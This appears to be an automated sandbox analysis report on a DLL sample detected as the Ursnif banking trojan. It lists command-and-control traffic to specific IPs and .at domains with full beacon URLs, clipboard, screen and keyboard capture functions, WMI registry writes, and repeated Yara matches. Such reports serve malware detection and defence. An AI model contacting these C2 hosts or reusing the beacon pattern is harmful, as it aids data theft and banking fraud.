Source: unknown	TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown	TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown	TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown	TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown	TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown	TCP traffic detected without corresponding DNS query: 31.214.157.187

Source: loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194214.157.187/
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.214.157.187/
Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8
Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/
Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/8
Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/8aMvIN0oJqk/wfo22krGhemAS6/6H_2FPRAH0bqwevjC8Pk5/kXre7OAlPZjP7YB8/
Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://config.edge.skype.com/drew/cmlyVQ2zwKm8fCRpP0VB/i6Zv1FcucRsB3XE0xRC/6VGWBAMEz_2Fh6VbcTZ9sL/wE
Source: WerFault.exe, 00000007.00000002.314858058.00000000049C9000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312995086.00000000049C8000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312888145.00000000049C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://habpfans.at/
Source: loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w
Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://habpfans.at/g
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll	String found in binary or memory: http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus
Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll	String found in binary or memory: http://www.dhtmlcentral.com/tutorial.asp

Source: unknown

DNS traffic detected: queries for: giporedtrip.at

Source: global traffic	HTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic	HTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic	HTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
Source: global traffic	HTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic	HTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic	HTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00E33B10 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

3_2_00E33B10

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00E34154 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

3_2_00E34154

Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00730108 GetProcessUIContextInformation,GetRawInputData,GetSystemMenu,Sleep,GetUserObjectInformationW,GetWindowBand,GetWindowCompositionAttribute,GetWindowFeedbackSetting,GetWindowMinimizeRect,ImpersonateDdeClientWindow,GetMenuBarInfo,InitializeInputDeviceInjection,GetMenuBarInfo,InitializePointerDeviceInjectionEx,InjectDeviceInput,InjectGenericHidInput,

0_2_00730108

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00E57B64 GetKeyboardState,

3_2_00E57B64

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: hFGZpat9Mf.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_007284AC CheckMenuItem,ExitWindowsEx,

0_2_007284AC

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0076B448	0_2_0076B448
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E7B448	3_2_00E7B448
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E41FAC	3_2_00E41FAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01082244	3_2_01082244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00ED17C8	3_2_00ED17C8

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 007064B8 appears 164 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 00706408 appears 48 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 00704068 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 00E16408 appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 00E164B8 appears 164 times

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072A41C NtdllDefWindowProc_A,	0_2_0072A41C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0074A9F4 NtdllDefWindowProc_A,GetCapture,	0_2_0074A9F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E3A41C NtdllDefWindowProc_A,	3_2_00E3A41C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E5A9F4 NtdllDefWindowProc_A,GetCapture,	3_2_00E5A9F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_010814BA SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	3_2_010814BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01082465 NtQueryVirtualMemory,	3_2_01082465

Source: hFGZpat9Mf.dll

Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
